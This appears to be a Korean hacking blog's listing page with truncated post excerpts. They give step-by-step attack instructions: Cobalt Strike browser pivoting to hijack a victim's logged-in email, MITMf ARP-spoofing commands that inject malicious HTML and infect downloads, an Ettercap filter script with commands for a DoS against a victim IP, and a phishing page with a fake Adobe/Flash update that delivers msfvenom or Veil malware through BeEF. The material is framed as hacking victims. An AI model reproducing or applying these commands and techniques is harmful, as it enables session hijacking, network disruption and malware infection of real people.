728x90 3. 웹 애플리케이션 취약점 진단136 브라우저 피봇 - 아디와 비번없이 해킹하기 코볼트 스트라이크가 필요합니다. 해킹된 피해자가 이메일에 들어가 있는 경우에 브라우저를 피보팅 하는것을 말합니다. 1.해킹 세션을 연결한후 프로세스 리스트에서 explorer.exe를 screenshot 해서 한 400초 정도로 잡아서 틀어줍니다. view-screenshots 에 가면 스크린샷들을 볼수 있습니다. 아이디와 비번은 모른 채로 피해자가 이메일에만 들어가 있는 것을 볼수 있게 됩니다. 2.해킹된 컴퓨터 우클릭 - explore - browser pivot 선택 체크가 된것과 체크되지 않은 프로세서가 있는데 체크 안된것은 아무 작동하지 않는 프로세서, 체크 된것이 작동하는 프로세서 입니다. 체크 된 것을 클릭해주시고 아래 프록시 서버 포트는 5글자의 아무 포트나 넣어주고 launch 3.그러면.. 2023. 12. 27. MITMF를 이용해서 웹사이트 해킹하기 & 다운로드 하는 파일에 자동 바이러스 주입 [보너스:웹사이트 이미지 거꾸로 만들기] 1.다른 웹사이트 자체를 해킹한다기 보다는 MITMF 공격에 악성코드를 넣은 index.html을 주입시킴으로써 해당 피해자가 해커의 사이트에 진입하여 감염 된 후 어느 사이트를 들어가던 해당 악성 index.html 화면이 아래에 보이게 됩니다. service apache2 start 로 apache 서버를 실행시켜 준 뒤 # mitmf --spoof --arp --hsts -i eth0 --gateway 게이트웨이 주소 --target 피해자 컴퓨터 아이피주소 --inject --html-file /ver/www/html/index.html 해당 명령어를 사용해 주면 됩니다. 2.감염된 피해자가 인터넷에서 무언가를 다운로드 받을때 해당 다운로드 파일에 mitmf가 자동으로 악성코드를 주입하여 다운로드.. 2023. 12. 27. 도스 공격하는 방법 feat. Ettercap dos.elt if (ip.src == '192.168.0.8' || ip.dst == '192.168.0.8') { drop(); kill(); msg("도스 공격중\n"); } 1.dos.elt를 메모장으로 생성 후 아이피 주소 부분을 피해자 아이피로 두개 다 변경해준뒤 저장합니다. 2.dos.elt 파일이 있는 경로로 이동 후 etterfilter dos.elt -o dos.ef [dos.ef로 바꾸어주어 ettercap에서 사용하도록 만듭니다.] 3.ettercap -i eth0 -T -q -F dos.ef -M ARP //// [상세 사용법] https://blog.naver.com/PostView.naver?blogId=dhwkffk&logNo=221977220688&parentCategor.. 2023. 12. 27. 피싱사이트 [어도비 업데이트 버튼 악성코드] html 코드 및 beef의 fake Flash Update 기능 [코드] AdobeUpdate.exe 바이러스를 만든 뒤(veil 이나 msfvenom) /var/www/html에 넣어두고 페이지를 열면 adobe.jpeg [미리 만들어둔 adobe 페이크 이미지] 와 함께 피싱페이지가 나오고 버튼을 누르면 바이러스가 다운로드 된다. 하지만 좀 더 레벨 높은 해킹을 위해 beef의 fake Flash Update 기능을 사용한다. social engineering 목록에 있으며, image 란은 http://192.168.0.8:3000/adobe/flash_update.png payload는 custom_payload custom payload URL 은 http://192.168.0.8 로 셋 해준뒤 execute를 눌러준다. 그러면 새로운 페이크 어도비 업데.. 2023. 12. 27. 이전 1 ··· 3 4 5 6 7 8 9 ··· 34 다음 728x90